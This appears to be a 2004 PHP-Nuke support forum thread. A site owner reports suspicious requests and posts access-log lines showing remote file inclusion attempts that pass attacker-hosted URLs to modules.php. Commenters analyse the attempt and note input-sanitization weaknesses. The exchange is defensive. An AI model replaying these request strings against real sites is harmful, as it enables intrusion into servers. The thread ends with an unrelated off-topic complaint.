|
- Readme First! -
Read and follow the rules, otherwise your posts will be closed |
|
|
|
|
|
There are currently, 320 guest(s) and 0 member(s) that are online.
You are Anonymous user. You can register for free by clicking here |
|
|
|
|
|
New hacking attempt on my site!!! |
|
 scandicdiscopub writes "They been trying to hack my site again,
http://www.grancanariayoungsters.com
this time trying to get a script injected as a module.
In my ms analysis at modules i had a really strange url there.
http://republica.bg/.i/2
check it out that site has got loads of scripts!!
ip of the guy is :
11:17:43 Guest http://republica.bg/.i/2 Unknown Other Other 64.191.57.190
i traced it and looks it cxomes from california but Im not an expert on this tracing stuff...
Somebody plz can have look!
SUBMIT THIS INMEDIATLY PLZ
Admin Note: What other information do you have that may indicate this is a hacking attempt? "
|
|
Posted on Monday, January 12 @ 09:44:30 CET by Zhen-Xjell |
|
|
|
|
| |
|
Average Score: 5
Votes: 1
|
|
|
|
|
|
|
| | The comments are owned by the poster. We aren't responsible for their content. |
| | | | |
| No Comments Allowed for Anonymous, please register | | | | |
Re: New hacking attempt on my site!!! (Score: 1)
by scandicdiscopub on Monday, January 12 @ 12:40:05 CET
(User Info | Send a Message) | because of this script ,i think its rather unusual script for a bot or so.
im not good with the security but in my eyes someone is trying to get specific information and i reported it because i think thats suspicious,and would like your expertise. |
]
Re: New hacking attempt on my site!!! (Score: 1)
by scandicdiscopub on Monday, January 12 @ 13:24:58 CET
(User Info | Send a Message) | 64.191.57.190 - - [12/Jan/2004:12:15:04 +0100] "GET /modules.php?name=http://republica.bg/.i/2 HTTP/1.0" 200 43814 "-" "Python-urllib/1.15"
and
64.191.57.190 - - [12/Jan/2004:12:17:40 +0100] "GET /modules.php?name=http://republica.bg/.i/2&file=http://republica.bg/.i/2 HTTP/1.0" 200 43871 "-" "Python-urllib/1.15"
|
]
]
Re: New hacking attempt on my site!!! (Score: 1)
by scandicdiscopub on Monday, January 12 @ 13:56:57 CET
(User Info | Send a Message) | i cant seem to get into the forums but thanks a lot,next time before making any suggerations i will think twice,thank you very much and i will look into it more,
so situations and make you loose your time can be avoid in future.
|
]
Re: New hacking attempt on my site!!! (Score: 1)
by Zhen-Xjell on Monday, January 12 @ 14:16:32 CET
(User Info | Send a Message) http://castlecops.com | | No worries... it actually might help someone out too that is not commenting here. Happens a lot that kind of indirect help... :D |
]
| | | | |
Re: New hacking attempt on my site!!! (Score: 1)
by kipuka on Monday, January 12 @ 17:09:09 CET
(User Info | Send a Message) | I disagree. These guys were indeed trying to break in like you originally thought. Don't focus on the UA string because that can easily be faked out. Look at the URL string instead. They were trying to upload this file and run it on your server. (note: I had to intentionally break the code up by adding extra spaces and underscores because Nuke's filter wouldn't allow it to be displayed here.)
">
_
These guys tried twice and got 200's both times. I don't know if they were really successful in executing this but it was a hacker visit and not a harmless crawl or fetch of a page. I cannot execute system calls like this on my server. I suggest you grab a fresh copy of this code off their site, put it in a file on your server, and duplicate what they tried to do to see if they got anything off your server and whether this is a vunerability or not. |
Re: New hacking attempt on my site!!! (Score: 1)
by kipuka on Monday, January 12 @ 17:13:21 CET
(User Info | Send a Message) | | Grrr. I got this to display all nicely in preview but it still got filtered out. Oh well, go to this url you cited: http://republica.bg/.i/2 and look in the file they tried to upload. You will see a php script with system commands in it. |
]
Re: New hacking attempt on my site!!! (Score: 1)
by kipuka on Monday, January 12 @ 17:39:28 CET
(User Info | Send a Message) | I tried uploading a file from another domain this way and it doesn't work on my system. Looking at the code in 6.9 for this particular file, I don't see anyone being able to upload anything off-server like this. I don't know if the same applies for all the other versions.
|
]
Re: New hacking attempt on my site!!! (Score: 1)
by Zhen-Xjell on Monday, January 12 @ 22:21:17 CET
(User Info | Send a Message) http://castlecops.com | Changing user-agents is certainly a trivial task. However, the agent being used is somewhat of an obscure one that not many folks know.
But take a look at the request to the server:
/modules.php?name=http://republica.bg/.i/2
Its trying to call a module that tends to be a URL. There is no provision there to upload a file to the server. This doesn't provide for any cross site scripting. |
]
Re: New hacking attempt on my site!!! (Score: 1)
by kipuka on Tuesday, January 13 @ 06:37:09 CET
(User Info | Send a Message) | I agree the UA is not very common and as such was effective in diverting attention. The focus though needs to stay on the URL when a visitor adds an off-site domain to it, and the code checked for vulnerabilities if it hasn't already been.
I went back and looked at this a little more. I still don't see someone being able to upload a file this way at least not in 6.9. However, I think you should note:
-- The variable $name is not properly sanitized here before being used in a sql call.
-- The sanitization routine for $_GET variables in mainfile.php lacks a check for single quote usage.
-- As you know already, phpnuke uses globals quite freely. These can be set via $_GET, $_POST, or $_COOKIE. Unless the code specifically limits the method used for setting a variable, whatever you're filtering out in $_GET most likely should be done for $_POST and $_COOKIE too. |
]
Re: New hacking attempt on my site!!! (Score: 1)
by scandicdiscopub on Tuesday, January 13 @ 06:45:44 CET
(User Info | Send a Message) | hmm now yet another url come up in my msanalysis and is this one:
http://www.grancanariayoungsters.com/modules.php?name=http://202.169.225.211/sms/topix.txt?
http://202.169.225.211/sms/topix.txt? looking at trhis one looks like an sql injection
im crying here although if im correct stuff like that only work on windows machines and not on linux yes? |
]
Re: New hacking attempt on my site!!! (Score: 1)
by Zhen-Xjell on Tuesday, January 13 @ 10:02:29 CET
(User Info | Send a Message) http://castlecops.com | | If you try that actual link you'll notice that it says such a file doesn't exist. Hacking attempts on servers and workstations across the net seems to be a natural problem. One has to decide which ones matter, and which ones can be ignored. With this data so far if it happened on NC, I would ignore it. But that's MHO. |
]
| | | | |
Re: New hacking attempt on my site!!! (Score: 1)
by alaskanvictim on Thursday, February 12 @ 21:41:36 CET
(User Info | Send a Message) | must be crooked cops, i just subscribed to complain about the anchorage police dept bugging my web telephone, apartment, and runing a name calling campaign agaist me for they broke into my safety deposit box and robbed me, they said if anyone talked to me was going to be arrested, and i got death threats, and we are costantly followed, and run off the road by their links, now i subscribed here, and my password shows in the email u sent me so APD already know the new password, and they will impersonate me as they always do, and if u sent me another they will see it too, i cant do anything in the internet they desconnect everything, bugg and disable my links,and no one will dare to talk to us unless he/she is anchorage police sent, i dont even get my emails they delited me from all my lists, my web is so so slow, because of their bugg, please help
i am afraid for our lives.
thank you,
|
| | | | | |
